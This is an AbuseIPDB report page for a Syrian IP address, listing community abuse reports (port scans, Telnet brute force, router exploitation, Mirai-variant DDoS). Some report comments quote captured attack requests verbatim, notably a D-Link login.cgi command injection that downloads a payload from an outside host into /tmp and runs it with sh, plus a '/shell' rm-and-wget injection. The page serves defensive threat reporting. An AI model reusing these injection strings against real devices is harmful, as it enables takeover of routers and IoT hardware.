JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 131.222.210.17

131.222.210.17 was found in our database!

This IP was reported 17 times. Confidence of Abuse is 81%: ?

81%

ISP	Telecom SY
Usage Type	Fixed Line ISP
ASN	AS216472
Domain Name	highspeed-sy.com
Country	🇸🇾 Syrian Arab Republic
City	Damascus, Damascus Governorate

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 131.222.210.17

Whois 131.222.210.17

IP Abuse Reports for 131.222.210.17:

This IP address has been reported a total of 17 times from 16 distinct sources. 131.222.210.17 was first reported on May 23rd 2026, and the most recent report was 8 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 NXTwoThou	2026-06-04 10:21:01 (8 hours ago)	/shell%3Fcd+/tmp;rm+-rf+*;wget+	Web App Attack
🇺🇸 xmission.com	2026-06-04 09:47:41 (9 hours ago)	Blocked by UFW (TCP on 80) Source port: 56438 TTL: 45 Packet length: 44 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 80) Source port: 56438 TTL: 45 Packet length: 44 TOS: 0x00 This report (for 131.222.210.17) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Web App Attack
🇷🇺 6o6ep	2026-06-04 08:36:48 (10 hours ago)	GET / HTTP/1.0	Port Scan Bad Web Bot
🇩🇪 KPS	2026-06-01 09:43:48 (3 days ago)	PortscanM	Port Scan
🇭🇺 bcsaba	2026-05-31 20:10:39 (3 days ago)	Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection	Web App Attack
🇫🇷 hghosting	2026-05-30 11:48:28 (5 days ago)	CrowdSec auto-report: crowdsecurity/suricata-major-severity — 1 events	Brute-Force SSH
🇧🇷 SOC PR	2026-05-30 10:26:04 (5 days ago)	IPS: Command Injection Over HTTP.	Web App Attack
🇨🇿 kronos	2026-05-29 19:33:31 (5 days ago)	IDS: ET WEB_SERVER WebShell Generic - wget http - POST \| SID:2016683	Port Scan
🇫🇷 vtchost.com	2026-05-29 19:22:49 (5 days ago)	minux.cc:80 131.222.210.17 - - [29/May/2026:21:22:49 +0200] "POST /GponForm/diag_Form?images/ HTTP/1 ... show more minux.cc:80 131.222.210.17 - - [29/May/2026:21:22:49 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 400 450 "-" "terrabot-owned-you" ... show less	Bad Web Bot
🇺🇸 MPL	2026-05-29 18:34:30 (6 days ago)	tcp/80	Port Scan
🇸🇪 peterh	2026-05-29 13:37:00 (6 days ago)	131.222.210.17 - - [29/May/2026:15:37:22 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233 ... show more 131.222.210.17 - - [29/May/2026:15:37:22 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233.190.47/dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 226 "-" "terrabot-owned-you" show less	Bad Web Bot Web App Attack Hacking
🇩🇪 SMARTNET	2026-05-27 06:03:53 (1 week ago)	Aisuru(Mirai variant) DDoS \| Incident ID: 991a3054-d12a-4e5e-ac87-2c17a3082180	DDoS Attack
🇨🇭 TOCE	2026-05-26 22:43:32 (1 week ago)	37 hits seen on 2026-05-27, ports 23 (Telnet) on a honeypot from www.toce.ch	Brute-Force
🇨🇭 TOCE	2026-05-26 21:59:45 (1 week ago)	3 hits seen on 2026-05-26, ports 23 (Telnet) on a honeypot from www.toce.ch	Brute-Force
Anonymous	2026-05-24 20:04:00 (1 week ago)	Unauthorized access (tcp/23/telnet)	Port Scan

Showing 1 to 15 of 17 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇧🇷 201.68.171.154

🇦🇷 190.181.97.79

🇺🇸 173.230.155.26

🇨🇳 123.101.228.206

🇸🇬 98.159.43.84

🇽🇰 84.22.62.247

🇬🇷 79.131.103.152

🇨🇳 36.134.69.15

🇺🇸 34.181.148.118

🇺🇸 207.90.244.18

🇬🇧 185.247.137.157

🇺🇦 185.218.138.55

🇦🇺 103.208.219.38

🇳🇱 45.148.10.183

🇬🇧 45.137.126.20

🇨🇳 39.78.253.13

🇹🇼 34.80.84.68

🇰🇷 222.118.59.16

🇰🇷 211.37.174.62

🇺🇸 205.210.31.68